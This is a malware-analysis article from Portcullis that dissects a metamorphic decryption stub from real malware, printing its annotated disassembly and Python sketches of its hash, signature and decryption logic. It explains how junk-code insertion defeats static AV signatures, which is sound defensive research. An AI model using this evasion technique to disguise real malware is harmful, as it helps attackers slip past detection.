With hundreds of thousands of malware samples circulating on the internet, AV companies struggle every day to keep their detection signatures up to date. These malware samples are not necessarily all functionally different from each other, but most of them try to appear different in an attempt to bypass AV products.
In reality, polymorphism is still much more popular than metamorphism. The reason is that polymorphism, as we see it in today's malware samples, is far easier to achieve.
Metamorphism requires re-implementing parts of the code while keeping the same functionality, whereas polymorphism is generally applied by keeping the code intact but encrypting it each time with a different method or with different encryption keys. Metamorphism is also commonly achieved through the insertion of junk code that can be changed quickly, which makes it effective at defeating static detection. This could be considered ‘cheap metamorphism’, since no real re-implementation of the code takes place, but the code does appear different.
Consider these two concepts as follows: polymorphism is mainly applied to the code itself, while metamorphism is usually applied to the code decryption routine which always operates as the first layer of execution.
Both techniques produce a different executable, which means that the file hash calculated for it will be different. Furthermore, even hashes of the byte streams of individual sections of the executable might be affected.
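To make the point about hashes concrete, the following minimal Python sketch hashes two byte buffers that differ only by one inserted junk instruction. The buffers are made-up illustrations (two opcodes taken from the listings in this article plus a single NOP), not a real sample, and the choice of SHA-256 is an assumption; any cryptographic hash behaves the same way.

```python
import hashlib

# Illustrative "useful" code: XOR BYTE PTR [EBX], 3F ; LEA EBX, [EBX+1]
original = bytes.fromhex("80333F" "8D5B01")
# The same two instructions with one junk NOP (0x90) inserted between them
variant = bytes.fromhex("80333F" "90" "8D5B01")


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of a buffer as a hex string."""
    return hashlib.sha256(data).hexdigest()


# The two buffers behave identically when executed, yet the digests differ,
# so a signature based on the hash of one will not match the other.
print(sha256_hex(original))
print(sha256_hex(variant))
print("hashes match:", sha256_hex(original) == sha256_hex(variant))
```

A single junk byte is enough to invalidate a hash-based signature, which is why junk code insertion is so cheap for the malware author.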
In this article we will show a piece of code from real malware, analyse how metamorphism using junk code is achieved, discuss why it can often be considered more practical than re-implementing the code or changing its logic, and show how it is extremely efficient when combined with polymorphic malware.
As mentioned, AV companies have to keep up with a large number of new malware samples coming out every day. This requires automation, which makes automation a necessary evil. Automation, whilst good for business, does lead to blind trust in antivirus programs.
Furthermore, even when automation is not used, speed is of the essence both in updating signatures and in the functionality surrounding the detection engine.
Malware analysts in AV companies are bombarded by client requests to quickly analyse malware and push out new detection signatures. There is simply no time to lose. So, in order to keep up, the analyst's first choice will be to create a static signature based on the hash of either the entire file or a portion of it.
This approach is used because hash-based detection signatures are efficient, fast, and highly unlikely to trigger any false positives.
This whole process can be summarised by the famous quote “So few are the easy victories as the ultimate failures.” (Marcel Proust)
Going through metamorphic code in order to understand which pieces of code are ‘reserved’ for breaking signature-based detection is not a trivial task and often requires extra time, but it really is worth it.
The main reason is that once we exclude the code used to obfuscate the useful instructions, we can establish which parts of the code are likely to change in a future sample and which parts are likely to remain the same.
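As a rough illustration of what can be done once the stable parts are known, the sketch below builds a pattern from a few effective instruction encodings (taken from the decryption stub analysed in this article) and allows a bounded run of arbitrary bytes between them. The names `STABLE_PARTS`, `MAX_GAP`, `build_signature` and `matches` are hypothetical, the gap limit is an assumed value, and this is not how any particular AV engine works. Note also that a polymorphic variant may change keys and constants, so such a pattern would need revisiting per family.

```python
import re

# Encodings of four effective instructions from the stub in this article
STABLE_PARTS = [
    bytes.fromhex("BB0001A041"),  # MOV EBX, 41A00100
    bytes.fromhex("C1CB72"),      # ROR EBX, 72
    bytes.fromhex("C003B4"),      # ROL BYTE PTR DS:[EBX], 0B4
    bytes.fromhex("80333F"),      # XOR BYTE PTR DS:[EBX], 3F
]
MAX_GAP = 64  # assumed upper bound on junk bytes between two stable parts


def build_signature(parts, max_gap=MAX_GAP):
    """Join the stable parts with a lazy 'any bytes' gap of bounded length."""
    gap = b".{0,%d}?" % max_gap
    pattern = gap.join(re.escape(part) for part in parts)
    return re.compile(pattern, re.DOTALL)  # DOTALL so '.' also matches 0x0A


def matches(signature, sample: bytes) -> bool:
    return signature.search(sample) is not None


signature = build_signature(STABLE_PARTS)

# Two synthetic variants: same stable parts, different junk in between
variant_a = b"\x90\x90".join(STABLE_PARTS)
variant_b = b"\x56\x5E\x47\xF8".join(STABLE_PARTS)
print(matches(signature, variant_a), matches(signature, variant_b))
```

Both synthetic variants match even though their bytes (and therefore their hashes) differ, because only the instructions that must survive are part of the pattern. The trade-off is a higher risk of false positives than with a plain hash.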
Note: We will be marking in red the junk code dedicated to achieving metamorphism. We will also mark with green the real effective instructions of the decryption stub. The code we are analysing is the decryption stub from real malware which is responsible for the polymorphic effect of the viral code.
Let’s take a look at the following chunk:
0040CC90  0FB7C1            MOVZX EAX, CX
0040CC93  3D 5CB13083       CMP EAX, 8330B15C
0040CC98  0FA5FF            SHLD EDI, EDI, CL
0040CC9B  C70424 00000000   MOV DWORD PTR SS:[ESP], 0
0040CCA2  810424 28BC0000   ADD DWORD PTR SS:[ESP], 0BC28  ← set the counter
0040CCA9  0FAFD7            IMUL EDX, EDI
0040CCAC  E8 09000000       CALL 0040CCBA
0040CCB1  61                POPAD
0040CCB2  8D1D 314F6B01     LEA EBX, DWORD PTR DS:[16B4F31]
0040CCB8  89ED              MOV EBP, EBP
0040CCBA  55                PUSH EBP
0040CCBB  8BEC              MOV EBP, ESP
0040CCBD  51                PUSH ECX
0040CCBE  58                POP EAX
0040CCBF  FFF1              PUSH ECX
0040CCC1  59                POP ECX
0040CCC2  33F1              XOR ESI, ECX
0040CCC4  5D                POP EBP
0040CCC5  58                POP EAX
0040CCC6  56                PUSH ESI
0040CCC7  5E                POP ESI
0040CCC8  57                PUSH EDI
0040CCC9  33D7              XOR EDX, EDI
0040CCCB  52                PUSH EDX
0040CCCC  5F                POP EDI
0040CCCD  89DD              MOV EBP, EBX
0040CCCF  5A                POP EDX
0040CCD0  50                PUSH EAX
0040CCD1  5F                POP EDI
0040CCD2  51                PUSH ECX
0040CCD3  5E                POP ESI
0040CCD4  BB 0001A041       MOV EBX, 41A00100
0040CCD9  C1CB 72           ROR EBX, 72
We can see a lot of code with only four effective instructions. Their only purpose is to set up the loop counter and make EBX point to address 0x00401068, which is the VA of the real entry point.
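It may not be obvious why `MOV EBX, 41A00100` followed by `ROR EBX, 72` yields 0x00401068. The short Python sketch below reproduces the arithmetic; it relies on the documented x86 behaviour that the rotate count is masked to 5 bits, so a count of 0x72 is effectively 0x12 (18). The helper name `ror32` is ours, not something taken from the malware.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right; the count is masked to 5 bits as on x86."""
    count &= 0x1F
    value &= 0xFFFFFFFF
    if count == 0:
        return value
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


ebx = ror32(0x41A00100, 0x72)   # MOV EBX, 41A00100 / ROR EBX, 72
counter = 0 + 0x0BC28           # MOV [ESP], 0 / ADD [ESP], 0BC28

print(hex(ebx))      # 0x401068
print(counter)       # 48168 bytes to decrypt
```

Splitting a constant into a scrambled immediate plus a rotate is a small obfuscation in its own right: the target address never appears as a plain operand in the stub.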
0040CCDC  F6D4              NOT AH
0040CCDE  86C2              XCHG DL, AL
0040CCE0  8D35 829BEB32     LEA ESI, DWORD PTR DS:[32EB9B82]
0040CCE6  8AE9              MOV CH, CL
0040CCE8  F7C7 812DF168     TEST EDI, 68F12D81
0040CCEE  0FBEC9            MOVSX ECX, CL
0040CCF1  F6D9              NEG CL
0040CCF3  69C2 C922C039     IMUL EAX, EDX, 39C022C9
0040CCF9  C003 B4           ROL BYTE PTR DS:[EBX], 0B4
0040CCFC  81D7 116F4A02     ADC EDI, 24A6F11
0040CD02  0FBBC0            BTC EAX, EAX
0040CD05  FFF2              PUSH EDX
0040CD07  57                PUSH EDI
0040CD08  56                PUSH ESI
0040CD09  55                PUSH EBP
0040CD0A  5E                POP ESI
0040CD0B  5F                POP EDI
0040CD0C  33D4              XOR EDX, ESP
0040CD0E  46                INC ESI
0040CD0F  5D                POP EBP
0040CD10  5E                POP ESI
0040CD11  8D2D BEB17602     LEA EBP, DWORD PTR DS:[276B1BE]
0040CD17  56                PUSH ESI
0040CD18  3BE5              CMP ESP, EBP
0040CD1A  45                INC EBP
0040CD1B  5E                POP ESI
0040CD1C  41                INC ECX
0040CD1D  8033 3F           XOR BYTE PTR DS:[EBX], 3F
0040CD20  0FCF              BSWAP EDI
0040CD22  0FBAF8 A2         BTC EAX, 0A2
0040CD26  0FA4C7 E5         SHLD EDI, EAX, 0E5
0040CD2A  19D2              SBB EDX, EDX
0040CD2C  0FAFFB            IMUL EDI, EBX
0040CD2F  8AC7              MOV AL, BH
0040CD31  35 8C7F9BE9       XOR EAX, E99B7F8C
0040CD36  88E1              MOV CL, AH
0040CD38  0FA4D9 10         SHLD ECX, EBX, 10
0040CD3C  8033 B7           XOR BYTE PTR DS:[EBX], 0B7
In the code above we can see a lot of junk instructions that can be modified to break static detection signatures and only three effective instructions dedicated to the decryption of the viral code.
0040CD3F  FFF5              PUSH EBP
0040CD41  56                PUSH ESI
0040CD42  55                PUSH EBP
0040CD43  47                INC EDI
0040CD44  59                POP ECX
0040CD45  42                INC EDX
0040CD46  F8                CLC
0040CD47  5E                POP ESI
0040CD48  58                POP EAX
0040CD49  8D3D C36F1B00     LEA EDI, DWORD PTR DS:[1B6FC3]
0040CD4F  56                PUSH ESI
0040CD50  3BC0              CMP EAX, EAX
0040CD52  5A                POP EDX
0040CD53  8D35 F5A52602     LEA ESI, DWORD PTR DS:[226A5F5]
0040CD59  8D0D C8F63800     LEA ECX, DWORD PTR DS:[38F6C8]
0040CD5F  8D15 52E55000     LEA EDX, DWORD PTR DS:[50E552]
0040CD65  8BE8              MOV EBP, EAX
0040CD67  8003 98           ADD BYTE PTR DS:[EBX], 98
0040CD6A  8D05 2D26B201     LEA EAX, DWORD PTR DS:[1B2262D]
0040CD70  8D05 D0FD7900     LEA EAX, DWORD PTR DS:[79FDD0]
0040CD76  8D15 5B59CF01     LEA EDX, DWORD PTR DS:[1CF595B]
0040CD7C  BE 1DB22901       MOV ESI, 129B21D
0040CD81  6A E0             PUSH -20
0040CD83  47                INC EDI
0040CD84  5D                POP EBP
0040CD85  33CC              XOR ECX, ESP
0040CD87  F9                STC
0040CD88  C003 02           ROL BYTE PTR DS:[EBX], 2
Notice how much space is reserved for future code modification; this makes it easy to alter the executable without touching the effective instructions.
0040CD8B  48                DEC EAX
0040CD8C  0FA4F8 C9         SHLD EAX, EDI, 0C9
0040CD90  19C2              SBB EDX, EAX
0040CD92  D2E6              SHL DH, CL
0040CD94  0FC1D7            XADD EDI, EDX
0040CD97  0FADF7            SHRD EDI, ESI, CL
0040CD9A  8D3D 39273EB6     LEA EDI, DWORD PTR DS:[B63E2739]
0040CDA0  8033 31           XOR BYTE PTR DS:[EBX], 31
0040CDA3  52                PUSH EDX
0040CDA4  58                POP EAX
0040CDA5  51                PUSH ECX
0040CDA6  50                PUSH EAX
0040CDA7  F7D6              NOT ESI
0040CDA9  5F                POP EDI
0040CDAA  5D                POP EBP
0040CDAB  FFF6              PUSH ESI
0040CDAD  0F49F1            CMOVNS ESI, ECX
0040CDB0  89EE              MOV ESI, EBP
0040CDB2  F8                CLC
0040CDB3  47                INC EDI
0040CDB4  59                POP ECX
0040CDB5  51                PUSH ECX
0040CDB6  50                PUSH EAX
0040CDB7  84C2              TEST DL, AL
0040CDB9  59                POP ECX
0040CDBA  58                POP EAX
0040CDBB  0FB6CE            MOVZX ECX, DH
0040CDBE  56                PUSH ESI
0040CDBF  5D                POP EBP
0040CDC0  52                PUSH EDX
0040CDC1  5F                POP EDI
0040CDC2  57                PUSH EDI
0040CDC3  46                INC ESI
0040CDC4  5D                POP EBP
0040CDC5  0FAFCE            IMUL ECX, ESI
0040CDC8  55                PUSH EBP
0040CDC9  41                INC ECX
0040CDCA  5E                POP ESI
0040CDCB  42                INC EDX
0040CDCC  C003 C7           ROL BYTE PTR DS:[EBX], 0C7
More junk code, but only two effective instructions involved in the decryption routine.
0040CDCF  F7C5 A22F73DC     TEST EBP, DC732FA2
0040CDD5  C1E7 76           SHL EDI, 76
0040CDD8  15 47BA711D       ADC EAX, 1D71BA47
0040CDDD  D2CC              ROR AH, CL
0040CDDF  84D7              TEST BH, DL
0040CDE1  8AE9              MOV CH, CL
0040CDE3  8D5B 01           LEA EBX, DWORD PTR DS:[EBX+1]  ← increase pointer
0040CDE6  51                PUSH ECX
0040CDE7  66:B9 CE27        MOV CX, 27CE
0040CDEB  41                INC ECX
0040CDEC  5D                POP EBP
0040CDED  68 B4345F02       PUSH 25F34B4
0040CDF2  0F4AC6            CMOVPE EAX, ESI
0040CDF5  58                POP EAX
0040CDF6  FFF6              PUSH ESI
0040CDF8  FFF7              PUSH EDI
0040CDFA  F5                CMC
0040CDFB  5F                POP EDI
0040CDFC  8BF5              MOV ESI, EBP
0040CDFE  F7D7              NOT EDI
0040CE00  5A                POP EDX
0040CE01  68 9FA07100       PUSH 71A09F
0040CE06  0F40EF            CMOVO EBP, EDI
0040CE09  59                POP ECX
0040CE0A  40                INC EAX
0040CE0B  FF0C24            DEC DWORD PTR SS:[ESP]  ← decrease counter
0040CE0E  0F85 C8FEFFFF     JNZ 0040CCDC  ← loop up
0040CE14  0FC1F3            XADD EBX, ESI
0040CE17  01C2              ADD EDX, EAX
0040CE19  C6C4 B0           MOV AH, 0B0
0040CE1C  8BF7              MOV ESI, EDI
0040CE1E  0FBBF6            BTC ESI, ESI
0040CE21  0FC8              BSWAP EAX
0040CE23  88FA              MOV DL, BH
0040CE25  0FAFFB            IMUL EDI, EBX
0040CE28  2BDB              SUB EBX, EBX
0040CE2A  0F84 3842FFFF     JE 00401068  ← jump to decrypted code
0040CE30  70 15             JO SHORT 0040CE47
0040CE32  55                PUSH EBP
0040CE33  3C FC             CMP AL, 0FC
0040CE35  5A                POP EDX
0040CE36  68 511F4601       PUSH 1461F51
0040CE3B  C1CA 89           ROR EDX, 89
0040CE3E  58                POP EAX
0040CE3F  C1DA 5E           RCR EDX, 5E
0040CE42  0F48D4            CMOVS EDX, ESP
0040CE45  F9                STC
0040CE46  F9                STC
0040CE47  52                PUSH EDX
0040CE48  5B                POP EBX
The code we just examined leaves a lot of space for junk code modification, which breaks any static signature based on it.
Among all these instructions, only a few are real instructions that need to stay the same in order to keep the same encryption/decryption routine:
        MOV DWORD PTR SS:[ESP], 0
        ADD DWORD PTR SS:[ESP], 0BC28
        MOV EBX, 41A00100
        ROR EBX, 72
_Loop:
        ROL BYTE PTR DS:[EBX], 0B4
        XOR BYTE PTR DS:[EBX], 3F
        XOR BYTE PTR DS:[EBX], 0B7
        ADD BYTE PTR DS:[EBX], 98
        ROL BYTE PTR DS:[EBX], 2
        XOR BYTE PTR DS:[EBX], 31
        ROL BYTE PTR DS:[EBX], 0C7
        LEA EBX, DWORD PTR DS:[EBX+1]
        DEC DWORD PTR SS:[ESP]
        JNZ _Loop
        SUB EBX, EBX
        JE 00401068
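With the junk removed, the routine is small enough to re-express in a few lines. The Python sketch below mirrors the seven per-byte operations of the loop; as an assumption, rotate counts are masked to 5 bits (as x86 does) and then reduced modulo 8 for a byte operand. The `encrypt_byte` function is simply our own inverse, written to check the round trip; the original encryptor is not shown in this article, and all function names are hypothetical.

```python
def rol8(value: int, count: int) -> int:
    """Rotate a byte left; count masked to 5 bits, then taken modulo 8."""
    count = (count & 0x1F) % 8
    value &= 0xFF
    return ((value << count) | (value >> (8 - count))) & 0xFF


def ror8(value: int, count: int) -> int:
    """Rotate a byte right by the same effective count that rol8 would use."""
    count = (count & 0x1F) % 8
    value &= 0xFF
    return ((value >> count) | (value << (8 - count))) & 0xFF


def decrypt_byte(b: int) -> int:
    """The effective instructions of the stub, applied to one byte at [EBX]."""
    b = rol8(b, 0xB4)        # ROL BYTE PTR [EBX], 0B4
    b ^= 0x3F                # XOR BYTE PTR [EBX], 3F
    b ^= 0xB7                # XOR BYTE PTR [EBX], 0B7
    b = (b + 0x98) & 0xFF    # ADD BYTE PTR [EBX], 98
    b = rol8(b, 0x02)        # ROL BYTE PTR [EBX], 2
    b ^= 0x31                # XOR BYTE PTR [EBX], 31
    b = rol8(b, 0xC7)        # ROL BYTE PTR [EBX], 0C7
    return b


def encrypt_byte(b: int) -> int:
    """Assumed inverse: the same steps undone in reverse order."""
    b = ror8(b, 0xC7)
    b ^= 0x31
    b = ror8(b, 0x02)
    b = (b - 0x98) & 0xFF
    b ^= 0xB7
    b ^= 0x3F
    b = ror8(b, 0xB4)
    return b


def decrypt(data: bytes) -> bytes:
    """Apply the loop body to every byte, as the stub does for 0xBC28 bytes."""
    return bytes(decrypt_byte(b) for b in data)


plain = b"MZ\x90\x00example"
cipher = bytes(encrypt_byte(b) for b in plain)
print(decrypt(cipher) == plain)
```

A helper like this lets an analyst decrypt the payload statically, without running the stub, and it keeps working for future samples as long as only the junk changes.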
In short, in a piece of code totalling 441 bytes in length, only 63 bytes correspond to effective instructions, which means that almost 86% of the space occupied by the code we analysed is dedicated to the metamorphic engine.
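These figures can be checked directly against the listings. The following Python sketch derives the total size from the first and last addresses of the stub and sums the encoded lengths of the effective instructions; the variable names are ours.

```python
STUB_START = 0x0040CC90
STUB_END = 0x0040CE49  # one past the final one-byte POP EBX at 0040CE48

# (instruction, encoding) pairs for the effective instructions in the listings
EFFECTIVE = [
    ("MOV DWORD PTR SS:[ESP], 0",     "C7042400000000"),
    ("ADD DWORD PTR SS:[ESP], 0BC28", "81042428BC0000"),
    ("MOV EBX, 41A00100",             "BB0001A041"),
    ("ROR EBX, 72",                   "C1CB72"),
    ("ROL BYTE PTR DS:[EBX], 0B4",    "C003B4"),
    ("XOR BYTE PTR DS:[EBX], 3F",     "80333F"),
    ("XOR BYTE PTR DS:[EBX], 0B7",    "8033B7"),
    ("ADD BYTE PTR DS:[EBX], 98",     "800398"),
    ("ROL BYTE PTR DS:[EBX], 2",      "C00302"),
    ("XOR BYTE PTR DS:[EBX], 31",     "803331"),
    ("ROL BYTE PTR DS:[EBX], 0C7",    "C003C7"),
    ("LEA EBX, DWORD PTR DS:[EBX+1]", "8D5B01"),
    ("DEC DWORD PTR SS:[ESP]",        "FF0C24"),
    ("JNZ 0040CCDC",                  "0F85C8FEFFFF"),
    ("SUB EBX, EBX",                  "2BDB"),
    ("JE 00401068",                   "0F843842FFFF"),
]

total_bytes = STUB_END - STUB_START
effective_bytes = sum(len(bytes.fromhex(enc)) for _, enc in EFFECTIVE)
junk_ratio = (total_bytes - effective_bytes) / total_bytes

print(total_bytes, effective_bytes, f"{junk_ratio:.1%}")  # 441 63 85.7%
```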
In this article we have tried to demonstrate a practical example of a metamorphic decryption stub, achieved through junk code insertion. As shown, by inserting a lot of junk instructions among the useful ones, it is possible to reserve a lot of space for future modifications that would break static signatures that include those portions of code as a matching pattern. This also highlights why malware authors usually prefer this technique to bypass AVs while still using the same viral code.
Written by: Kyriakos Economou of Portcullis.